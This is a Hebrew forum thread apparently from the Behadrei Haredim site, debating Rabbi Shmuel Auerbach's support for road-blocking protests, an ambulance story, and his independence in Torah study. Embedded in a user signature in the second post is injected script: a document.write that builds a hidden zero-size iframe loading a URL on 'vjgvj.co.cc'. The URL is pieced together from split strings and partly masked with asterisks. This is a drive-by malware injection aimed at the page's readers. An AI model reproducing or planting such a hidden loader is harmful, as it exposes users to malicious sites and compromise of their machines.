בית פורומים עצור כאן חושבים

הרב שמואל אויירבך ע"ה

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-6/3/2018 15:19 לינק ישיר 

בעל בעמיו

אתה מזמין אותי להגן על עמדה שאני מתנגד לה?

אני  יכול לנסות.

א. הסיפורים (או הביטויים) הם לשון הפרזה - אלא שיש אצלנו, החרדים, חינוך לקחת דברים כפשוטם או כהפרזתם. אם הגדול אמר שזה "לא היתה כמותה" אז יש בחינה שלא היתה כמותה וזהו זה.

ב. יש התמודדות בין היהדות כפי שבאה במסורת לבין ביקורות מדעיות במובן הרחב. הפתרון של הסתגרות כבר לא כל כך עובד.

לכן צריך לכפות סגירות בכוח. זה אומר למנוע ליב"ה מכאן ולמנוע החשפות למראה של חילוני (או גרוע מזה: חילוניה) מכאן.

ג. יש כאלו שמאמינים שהממשלה הישראלית וכל מנגנוניה רוצים להמיר את הדת החרדית בחילונות (או בדרגות בינים במקרה הפחות בולט ולא פחות מסוכן).

ד. בעקבות פרשנויות קבליות, כל מי שמתנגד לחרדים, אפילו בתוך המחנה עצמו, הוא בחינת "ערב רב" או "עמלק". מייצגי "פך השמן הטהור" הם השארית של השארית, הטוב של הטוב. המאבק הוא אונטולוגי. כפי שאנו נלחמים כאן למטה כך נלחמים שם למעלה. הנצחון או מלחמת ההישרדות כאן הם על סיום המאבק העולמי וההיסטורי של איסוף הניצוצות ושבירת הרע. וכו' וכו'.

ה. בהמשך לנ"ל, עכשו עקבתא דמשיחא, שהתחיל לכל המאוחר בימי הח"ח כי כך אמר בעצמו ו"עיקבתא" צריך להסתיים בקרוב...

כאשר אדם מאמין שכל מה שכתבתי לעיל זה נכון, האם זו אינה מסקנה הגיונית שצריך להילחם כפי שהחתם סופר לחם נגד הרפורמה וכפי ששרידי היהדות לחמו נגד הסטאליניזם בשטחי ברית המועצות דאז?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 19:32 לינק ישיר 

מיימוני כתב:
אפרים

הביקורת שלך במקומה. למרות שהיא אינה ראיה נגד המקורות של ספרן.

אתמקד בנקודה אחת: מה סבר הרב שמואל לגבי שיגור נערים צעירים להפגנות ולגבי חסימת דרכים שיש בהם משום סכנה לחולה התקוע בדרך? לפי הגרסה שהבאת, שמע על כך והגיב: אתפלל עבורו.

האם זו גסות וחוסר אכפתיות? יתכן שהיה כאן חשבון הלכתי. "מאי חזית" כלומר "מה ראית" כלומר איך נתעדף בין שתי אפשרויות. נכון, כאן יש את החולה אבל מצד יש, לפי תפיסתו, פיקוח נפש של כלל ישראל, בנית עולם התורה האמיתי, המצומצם, בסגנון החזו"א והרב שך, כמו שראינו כמה הם חשובים לו במקורות בדפים הקודמים של האשכול.

איני מצדיק את הגישה שלו, אלא מנסה להבין את מה שעשוי היה לחשוב.

האם אין דרכים אחרות להלחם את מלחמות ההלכה ? רק הפגנות שכוללות סיכון חי אדם מתאימות ?

נתאר לעצמנו מי שאחראי להפגנה גדולה נגד נושא שנראה יותר קרוב לליבנו: שיחרור המולדת מידי כובש, אולי. שיחרור עצירים או החמרת עונשם של מחבלים, ויבחר כל אחד מאיתנו את הנושא הקרוב לליבו שלדעתו הוא יכול להיות חשוב כמו פיקוח נפש. ואז מתברר שההפגנה עלולה להזיק לטיפול בחולים. האם נגיד שצריך להפסיק את ההפגנה? לתת רק לאמבולנס לעבור? אולי כן. אבל יתכן מי שיאמר: הנושא הזה, שעליו ההפגנה, חשוב יותר מפיקוח נפש. גם החולה באמבולנס צריך להבין שהוא כרגע נתבע לשלם את מחיר הנושא שעליו מפגינים.

לא הורגים אנשים כדי להשיג מטרה . מי שעושה זאת הוא פושע. אבל מצפים מאיש הלכה שיתנהג יותר טוב ממפגינים אחרים. 

בעיניך ובעיני אי התייצבות בלשכת כדי לקבל פטור (!!) היא גסות רוח וחוסר הכרת הטוב. לא דייך שמשחררים אותך מלתת שלוש שנות צבא או שירות לאומי, אלא שאינך מטריח את עצמך להגיע, למלא כמה טפסים, ולצאת? אבל לכן הצעתי את הדימוי של הפגנות בנושאים אחרים.

כל מה שאפשר לטעון נגדו הוא מדוע חשב שזה כל כך חשוב. אולי חשד מאד מאד באנשי לשכת הגיוס שהם טומנים פח לצעירים תמימים. אולי, או קרוב לוודאי, נתן מעט מאד אמון ביכולתו של צעיר חרדי לעמוד מול פיתויים גשמיים.

אני מקוה שהצלחתי לשרטט מה שהיה עשוי להיות שיקול דעתו.

ועל שיקול הדעת הזה צריך לבכות.

וכיון שהחולים באמבולנסים הם משלמי המחיר, חש חיוב להתפלל עבורם. ובעיניו, תפילה היא השתדלות לא פחות מאשר פניה לרופא.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

בקשר לתפילה-כשאדם חולה מסוכן  דבר ראשון צריך למהר באמבולנס כמה שיותר מהר לבית חולים. ותפילה היא הדבר השני.(או בד בבד)  זה מה שהוא עצמו עשה וזה מה שהרבי מגור עשה.
לפני שמונים שנה כבר ראינו כמה עזרה תפילה בלבד.  
בכל מה שנוגע לעצמו-הוא מיהר אל הרופא. לאחרים הוא נותן למות באמבולנס.

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 19:44 לינק ישיר 

אני בטוח שלא היה מדובר במקרה של חולה שהיה אפשר להורות לכפופים לו לפנות את הכביש והוא היה מתפנה, אלא ככל הנראה סיפרו לו לאחר ההפגנה על דבר שאירע (אולי רצו לרמז לו או לומר לו בפירוש אילו תוצאות עלולות לקרות מההפגנות), או שהיה מדובר על עיכוב של האמבולנס כתוצאה מפקקי תנועה שנוצרו מההפגנות או כל מקרה אחר שלא היה בידו לפתור את המצב, אבל לחשוד אותו שהיה בידו לפנות את הדרך ולא פינה זה לא יעלה על הדעת ובכל אופן לא יעלה על דעתי

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 20:28 לינק ישיר 

כל מי שעיניו בראשו מבין שחסימת כבישים  ללא הודעה מראש בירושלים הפקוקה עלולה להוביל לאסונות. 

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 20:37 לינק ישיר 

עכשיו אתה טוען טענה אחרת לגמרי

שזה חמור מאוד שהוא יזם הפגנות למרות שזה עלול להביא לסכנה

אפשר להסכים עם הטענה או שלא להסכים, אבל אינני רואה שייכות בין טענה זו לסיפור שהרב אויערבך התפלל על חולה שהיה באמבולנס שנתקע בהפגנה

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 21:16 לינק ישיר 

שמחבחור כתב:
הוא היה עצמאי בלימודו, לא היסס (למרות שהוא עטף את זה בהרבה התחבטויות) לחלוק על רבי חיים הלוי ועוד (אינני זוכר עד להיכן אם עד הקצות החושן אבל נדמה לי שגם על רבי עקיבא איגר ועוד הוא חלק)

שתי עובדות שאני יכול להעיד מכלי ראשון, אשר שמעתי במו אוזני בשיעור:

- כשחלק על הגר"ח אמר זאת בנוסח כזה: ר' חיים, עפר אנחנו תחת כפות רגליו, רבן של כל ישראל ממש, אבל מה לעשות, מה שהוא אומר לא כתוב ברמב"ם.

- חלק על ה'נתיבות' במלא העוז באומרו: ברור כשמש שמה שאמר כאן ה'נתיבות' זה לא אמת.

דדווח על תוכן פוגעני

נשלח ב-6/3/2018 21:26 לינק ישיר 

בחייו שמעתי בישיבתו מתלמידיו שתי שמועות שאמר בשם הגר"ג נדל אחד שאמר שאיסור לעבור לפני המתפלל היום שייך אולי לפני הרב ישראל אליהו וינטרוב, ושנית שאין צריך להמתין שבעה ימים למילת תינוק שהיה חולה כפי שכתוב בגמרא

גם אמרו שאמר שהמחמאה הגדולה ביותר שקיבל בחייו היא מהגר"ג נדל כששאלו על אדם שלישי אם הוא משלנו

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 09:22 לינק ישיר 

אפרים בן

כבר ענה לך שמח בחור מה שהייתי יכול לענות בעצמי אילולא קדמני וענה היטב, לדעתי. ואיקון ירוק לו (ולך על הבירור!)

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 09:24 לינק ישיר 

אברהם העברי כתב:

שתי עובדות שאני יכול להעיד מכלי ראשון, אשר שמעתי במו אוזני בשיעור:

- כשחלק על הגר"ח אמר זאת בנוסח כזה: ר' חיים, עפר אנחנו תחת כפות רגליו, רבן של כל ישראל ממש, אבל מה לעשות, מה שהוא אומר לא כתוב ברמב"ם.

- חלק על ה'נתיבות' במלא העוז באומרו: ברור כשמש שמה שאמר כאן ה'נתיבות' זה לא אמת.

עד כאן דבריו

וזה נפלא שרב מרשה לעצמו לומר בפה מלא שאין הוא מסכים לדברי קודמיו כאשר כך נראה לו על פי סברה והוכחות. ואינו חושש. ("לכאורה נראה שדברי הנתיבות קשים...")

יפה גם עד כמה נזהר בכבודו של הרח"ק.

אבל משהו אחד צרם לי בלשונו, אם זה ציטוט מדוייק.

ר' חיים, עפר אנחנו תחת כפות רגליו, רבן של כל ישראל ממש,

היה צריך לומר: "עפר אני תחת כפות רגליו" וכו'. מה זה "אנחנו" המלכותי של ראש ישיבה בהקשר הזה?

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 09:27 לינק ישיר 

שמח בחור

תודה על שלוש השמועות!

זה מרתק. המוכנות שלו לחלוק על גדר שבעת ימי המתנה בניגוד לגמרא. כנראה על סמך דעת הרופאים. יש לציין שזה כמעט הכרחי כי אחרת מבטלים מצוות מילה שבעה ימים שלא לצורך. מענין מה אומר הרח"ק בנסיבות כאלו. שמא גם הוא מודה ש"נשתנו הטבעים".

לגבי המחמאה של הרב גדליה ע"ה, זו אכן מחמאה אדירה. ויש לעיין למה נתכוון והאם ובמה ראה הר"ג דמיון בינו לבין ר' שמואל.

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 09:45 לינק ישיר 

רבינו מיימוני

ברור לי שידידינו אברהם העברי כיוון לרבי חיים סולוביציק ולא לרבי חיים קנייבסקי

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 12:47 לינק ישיר 

לא היתה לי הו"א שצריך לפרש את זה..

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 13:36 לינק ישיר 

שמחבחור כתב:
"אני בטוח שלא היה מדובר במקרה של חולה שהיה אפשר להורות לכפופים לו לפנות את הכביש והוא היה מתפנה, אלא ככל הנראה סיפרו לו לאחר ההפגנה על דבר שאירע (אולי רצו לרמז לו או לומר לו בפירוש אילו תוצאות עלולות לקרות מההפגנות), או שהיה מדובר על עיכוב של האמבולנס כתוצאה מפקקי תנועה שנוצרו מההפגנות או כל מקרה אחר שלא היה בידו לפתור את המצב, אבל לחשוד אותו שהיה בידו לפנות את הדרך ולא פינה זה לא יעלה על הדעת ובכל אופן לא יעלה על דעתי"

"עכשיו אתה טוען טענה אחרת לגמרי שזה חמור מאוד שהוא יזם הפגנות למרות שזה עלול להביא לסכנה אפשר להסכים עם הטענה או שלא להסכים, אבל אינני רואה שייכות בין טענה זו לסיפור שהרב אויערבך התפלל על חולה שהיה באמבולנס שנתקע בהפגנה "

טענה אחרת לגמרי? האם אתה עיוור עד כדי כך  שאינך רואה את הקשר בין הטענות שטענתי? ? (וגם כמובן מיימוני שנתן לך לייק)

האם העובדה שזה לא קרה תוך כדי ההפגנה זה לא מספיק חמור בעיניך?  הרי במקום לומר "אתפלל עליו " הוא היה צריך לזעוק  :  "אתפלל עלי שהקב"ה יסלח לי על שיקול הדעת שלי שגרמתי לחולה נזק בגלל החלטתי השגויה להשתמש בנשק ההפגנות." וכששמע על זה הוא היה צריך להפסיק מיד לנקוט בנשק הזה. ומה שהרבה יותר גרוע בעיני זה שהוא שהוא לא צפה מראש שדבר כזה עלול לקרות.  
לומר :אתפלל עליו" בזמן שהוא עצמו פנה דבר ראשון במהירות הנדרשת לרופא בשעת מחלתו ולא הסתפק בתפילה- זה מחריד.

דדווח על תוכן פוגעני

נשלח ב-7/3/2018 16:30 לינק ישיר 

מה שרשמתי ע"מ לשלב בתוך גליון 'שמחת שלמה' מזקני רש"ש לוין זצ"ל.

זכרונות מר' שמואל.pdf

דדווח על תוכן פוגעני

נשלח ב-8/3/2018 00:21 לינק ישיר 

אפרים בן

כתבת

הרי במקום לומר "אתפלל עליו " הוא היה צריך לזעוק  :  "אתפלל עלי שהקב"ה יסלח לי על שיקול הדעת שלי שגרמתי לחולה נזק בגלל החלטתי השגויה להשתמש בנשק ההפגנות." וכששמע על זה הוא היה צריך להפסיק מיד לנקוט בנשק הזה. ומה שהרבה יותר גרוע בעיני זה שהוא שהוא לא צפה מראש שדבר כזה עלול לקרות.

איקון ירוק מאד.

שמח בחור, אברהם העברי

פשוט שאתם צודקים ותימה על אוילותי שנגרפתי לחשוב שהמעשה עוסק בזיקה בינו לבין הרח"ק בן זמננו.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > הרב שמואל אויירבך ע"ה
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 7 8 לדף הבא סך הכל 8 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.